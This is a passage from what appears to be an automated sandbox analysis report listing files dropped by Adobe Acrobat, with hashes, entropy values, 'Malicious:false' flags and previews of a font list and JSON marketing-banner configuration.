                                            Entropy (8bit):5.182478651346149
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:94185C5850C26B3C6FC24ABC385CDA58
                                            SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                            SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                            SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:PostScript document text
                                            Category:dropped
                                            Size (bytes):0
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:94185C5850C26B3C6FC24ABC385CDA58
                                            SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                            SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                            SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):295
                                            Entropy (8bit):5.35601963457481
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:0CF73E3F2B626D754085E8D81858A246
                                            SHA1:11F25CF89F2F1226DE50959132B4C7386B863BD3
                                            SHA-256:EAF4170ADDC3B3974320A3184BA6ACAEF335746FE2EF58B50D6F6F45177278CC
                                            SHA-512:18968A01ADCDD64EFE3F8F23E85223309A48944C0823A5528739E7065D96A59917B37DB24CD9AED703BB99A36AAE4568B4F9312250A5445556AF9EA292144B08
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):294
                                            Entropy (8bit):5.303894161798326
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:125A6E37036A13B0DBA8473DE039EB4D
                                            SHA1:B2133A954EF792A6ABCBE6DED575A24E2E71BF78
                                            SHA-256:B3DF7A60F15C7AAA601C67523CAEA4286CEF124037C8590767B13779BF5A161D
                                            SHA-512:936252F6E456FEE93AA78533B55759A947CB500EF21AA2C6D3ED577371ABA3594422D7A8D1A4E4331EB4ED9346DABA68D6E64A1FA00719569076991C20120D3E
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):294
                                            Entropy (8bit):5.281655232170152
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:5C40CDBEDE2DA316FDD8A41CB08ECA11
                                            SHA1:55446755A74956F03EB7740FE5CC02FE00D574DC
                                            SHA-256:78436C97CAC0EEB8F118F264E407CA6B8EB5C29DC099CB45C826C9C6B7C82437
                                            SHA-512:0A1B89001A9B67C2C898BC52AC6EC2DDE866E1523A4B12FC4A7DE1D52FDF6CE0C541FBE4FA57FEF28CDFFC6E2F6CFFACBA1F122AC1095B892A850C8DB5E36052
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):285
                                            Entropy (8bit):5.344142147816073
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:384912CCC485A7C650D96572C014EF51
                                            SHA1:1C3146151BA7584496F5E37E22F4139E4FCA39DB
                                            SHA-256:88FCAAC0C60EA4A17312F8BF6D2CA10404740913A5D8ED712EF2793AF2EACA66
                                            SHA-512:EEE87F3B69987125632F3FCA32A3DD6807E70990080B45D4169B6A5BCC7440CE9D892026220C91995E1B9D2C2840CA57F32C9BAE13472BBE0021D724C5004A4D
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):1063
                                            Entropy (8bit):5.6643418271206425
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:1151DA5F42EB5BF3A004F2CAD96950E9
                                            SHA1:6DC1A108C935C12E2526845EC5405DC4D7298881
                                            SHA-256:AD276E23693058DD8C4F4EC966B2D18C4ED321F535973C228AFBD1C92AECEF0F
                                            SHA-512:898A5C5B0B0F8A128EF0B019AB9D823177A305FB5C841F58D3025CB5B4EE134053A9B56ADE91ED9EB7D42855858603D01C9B4D0DAC5201083025921F2BFDF137
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_2","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"afb9c2a3-eaf4-41f9-9d73-768e72f72282","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQgZmlsZXMgdG8gYW5kIGZyb20gUERGXG53aXRob3V0IGxpbWl0cy4ifSwidGNhdElkIjpudWxsfQ==","dataType":"application\/json","encodingSc
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):1050
                                            Entropy (8bit):5.647661749687418
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:B0F1A43D23AD4C9327D7623B17522CD6
                                            SHA1:0E8BDA1AEA09F68CAD56D5744BE3AFBBCD159DA5
                                            SHA-256:C05AC199C7E8415AF10D1DA63D39CCCB76A77F91FD0CC1470429AE27A53360D3
                                            SHA-512:86AB2AE403B7DD95BF0EC7BCCBBC2DD065D9C875C3DEAACD5EEA3EE6611E430C5CA2C187FA563F225616BABE392F3332FDBEDB3E7E76522AF7C85E44783A1EDF
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_0","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"0924134e-3c59-4f53-b731-add558c56fec","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuZm9ybXMgJiBhZ3JlZW1lbnRzLiJ9LCJ0Y2F0SWQiOm51bGx9","dataType":"application\/json","encodingScheme":true},"
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):292
                                            Entropy (8bit):5.292452198201685
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:9EACB418F5715ABD43AFF2B58FB74E6E
                                            SHA1:157BA07DB0D68D6946B45D5ECFEAF7A4E268F2A5
                                            SHA-256:9588D68C54D3DC525DF7494D229ADCBE5E3AA91F92DEA99AB7FCF614BC79D135
                                            SHA-512:F69ED14D9A2675843DF70D748E28C2DBC60F640DCFB0E91FE8B1333E32231B00B2F4FE3E39E26F5C56296E63C46E277FC1FCA59122D4B9E3347CD09D6E0E3E11
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):1038
                                            Entropy (8bit):5.641652292301192
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:2F6F90DCE374E5CD42A7F1B9F48914D7
                                            SHA1:FA167EC94F8BDBF1F160CB105C2853CB8085765D
                                            SHA-256:7B6D1E82617A34523B61B9318EE9BDCF39B7BE3E14F08537E187FC8B8658F1BE
                                            SHA-512:EF737431AB7562177A91FC4942391BFC113DB1F551634A2C07A083BDA460B335098AA365CF501E7EDB2510B9ABECF1E81E1B95DF70F6FDC324572703BC1420CE
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_1","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"49d2f713-7aa9-44db-aa50-0a7a22add459","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVkaXQgdGV4dCwgaW1hZ2VzLCBwYWdlcywgYW5kIG1vcmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme":true},"endDTS":1744
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):1164
                                            Entropy (8bit):5.693957444110654
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:8873E7CF44E674B1D09F452FDF5498F6
                                            SHA1:C21FDDF71B82ED86AC83EDDF97DB05FFAA356245
                                            SHA-256:AC2CB670A6A4EBFE202B6D46B8D3A0B2908F084CEA1F205F2439785B95FA1A71
                                            SHA-512:ABE5AFA449695DFEA82D9016905489A38998D882A2B2E9A5BF6845A9AB0DAAFAD4C1BA7F4ABAF739CA0F117B6864E930AE75E03B55D8CEC43C6456C7A6332675
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):289
                                            Entropy (8bit):5.297167881412326
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:F4C524DD5EC4B79258A7EDEC8CF336E2
                                            SHA1:E3DCBAE38FAB97459D51F31FA52626005F7037E5
                                            SHA-256:F68EB3786C7A6FC8191D4E5A30958582236DE612866510EB577C753DDB4B1D86
                                            SHA-512:3FA823F9ADCF39C4D6FDEAE1C4F85C74F573196D37F383863E2C8AB7A5471085AFB0AD4157034596A820AF4EB990627F0E48EE41C89B122D1A9DE8B0406CF4DC
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):1395
                                            Entropy (8bit):5.772623008800307
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:EE2EF66ED3B4DB567A3778B2954B8D96
                                            SHA1:8317C88B6E4FCCA55A759437DEC1D13319355784
                                            SHA-256:1F936ADE4F9607906EE2D692888041D2518B870D0533CABC653477FD93F7C8F5
                                            SHA-512:45E9F7840594DCBDB6957CB7D017DD5AC31DECAB0C0385D7D2B3D2CCD1ECA73A44B129BEEAA4A677704194482EF071D96EB2943CC1EB0C757D047ABD7A33E899
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):291
                                            Entropy (8bit):5.280734443818751
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:F67D4F0D68E31CB3701F38591BA29BE5
                                            SHA1:6C185AF0C3800945B0E6992B0D01A2DDB4640058
                                            SHA-256:E8119E9B43AAD212A2A0A804CD61BA64F95C274AD4DC054FE7A9FABDA9042E12
                                            SHA-512:92B69ABE4D57C6734CDC14427DEC6BFAFFF866874FEBEB3E04C29881B0F8BC50555C97DD3249A36A69C93F01B938C3E1EFB98195C5ECC52B6D1D691339A83CF0
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):287
                                            Entropy (8bit):5.283762182770641
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:C124F5309CA96330800B8456FF75D995
                                            SHA1:0F0B974D367E293A47BEA5A936E7B6B4421C2F6D
                                            SHA-256:6E0CEE62DBA4A93CAEFE1EE169B1BED32772A46C8938A9806CE519EAF3E907D3
                                            SHA-512:B9F290F7955AF775645CDA8D509E0CECF2AF0D4165FE1BB5491A232BB24BA35A93865A9D4448B45E0D6F358D95FCBE6754A4230134F30596EDD29BDF3B16205C
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):1058
                                            Entropy (8bit):5.651660969272332
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:134E1DCE43E0C2A8FE0091432D27B048
                                            SHA1:AF4993787BA62665932FC8953400546B694D4D6A
                                            SHA-256:F8245A05A5AEB795D13A5B8221AD36C60A48EA7108D2C06B97C56E660AB7CD9E
                                            SHA-512:1DA327DF804316A94B7FDB460A0D41E8D5D148BDCB8AA2793756A8BEF8FBEF2CC81531C79FBB31ABA0E2AD9455E58C692B80873638D008E4F60C397376D0FEC3
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_3","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"ece07729-7db6-4f20-9f8d-7976ad373049","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IlNlbmQgZG9jdW1lbnRzICYgZm9ybXNcbmZvciBmYXN0IGUtc2lnbmluZyBvbmxpbmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme"
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):286
                                            Entropy (8bit):5.258858829267452
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:EAE4746B914E97ECEF850E565D230909
                                            SHA1:A526BA39761F14D1E998A5B46E4FC04298A444A1
                                            SHA-256:42C021F30AAAAEF97ED4E102F389E3BC09AFAC8F269C21A3646FFB1CA114AD03
                                            SHA-512:1D98FC277A5FB63775F99C12D87243B61C048ABED7D9102147941E982A0F044F3BE1BBB8F32A6B122FEB59999B7288FA8218A7498C928E65673AEDF7C6D6AE1C
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):782
                                            Entropy (8bit):5.3679361801380345
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:81624DE1F8B546F634699E3699E0093F
                                            SHA1:A6DF2C360E4EE70C478587C54830796459C06FCC
                                            SHA-256:87472AC8FC810118736DC23ABAB5B1D990E5C44DD249DE88BE0296F58EED9194
                                            SHA-512:73D6BDC38D407D37A71059F6185EF5EE2B4F7B018F40A621B599C32A4D794FB9CCD96E361B349531A78C14BD7749CF7C011C368A6C4927728F8FE7C14A0F7585
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:{"analyticsData":{"responseGUID":"af014e1b-c595-45dc-bebc-014b99d5cd68","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1724948244084,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1724774109113}}}}
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):4
                                            Entropy (8bit):0.8112781244591328
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                            SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                            SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                            SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:....
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):2818
                                            Entropy (8bit):5.132886420833241
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:CBCFA6A273D726B65E3E638563409DE3
                                            SHA1:9D39B63B3D4768E08329197E62447BA8E39B7F1B
                                            SHA-256:E6D9A26C6A6AC14E7211D4B240D138FB2BEA8779290EECE797B7B9E4A4961F12
                                            SHA-512:482FE71EAE36403CBD2666A1EDD13F7AE2322130B54C4FCBA1E556E316C67DE05CB3557F98F331F16DD7A1E3BCA61055E98330E2FA3DA15DEE796F589A1B54E2
                                            Malicious:false
                                            Reputation:unknown
